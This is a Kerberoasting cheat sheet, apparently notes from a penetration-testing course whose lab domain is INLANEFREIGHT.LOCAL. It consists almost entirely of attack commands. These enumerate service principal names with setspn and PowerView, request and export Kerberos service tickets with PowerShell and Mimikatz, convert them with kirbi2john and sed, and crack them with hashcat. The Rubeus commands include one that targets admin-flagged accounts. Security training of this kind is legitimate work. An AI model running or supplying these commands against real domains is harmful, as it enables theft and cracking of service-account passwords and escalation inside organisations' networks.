15. Kerberoasting - from Windows

Enumerating SPNs with setspn.exe

setspn.exe -Q */*

Targeting a Single User (PowerShell)

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Retrieving All Tickets Using setspn.exe (PowerShell)

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Tickets from Memory with Mimikatz

mimikatz # base64 /out:true
mimikatz # kerberos::list /export

Preparing the Base64 Blob for Cracking (Linux)

echo "<base64 blob>" | tr -d \n

Placing the Output into a File as .kirbi (Linux)

cat encoded_file | base64 -d > sqldev.kirbi

Extracting the Kerberos Ticket using kirbi2john.py (Linux)

python2.7 kirbi2john.py sqldev.kirbi

Modifying crack_file for Hashcat (Linux)

sed 's/\$krb5tgs\$(.*):(.*)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Viewing the Prepared Hash (Linux)

cat sqldev_tgs_hashcat

Cracking the Hash with Hashcat (Linux)

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Using PowerView to Extract TGS Tickets (PowerShell)

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Using PowerView to Target a Specific User (PowerShell)

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting All Tickets to a CSV File (PowerShell)

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Viewing the Contents of the .CSV File (PowerShell)

cat .\ilfreight_tgs.csv

Using Rubeus (PowerShell)

.\Rubeus.exe

Using the /stats Flag (Rubeus)

.\Rubeus.exe kerberoast /stats

Using the /nowrap Flag (Rubeus)

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap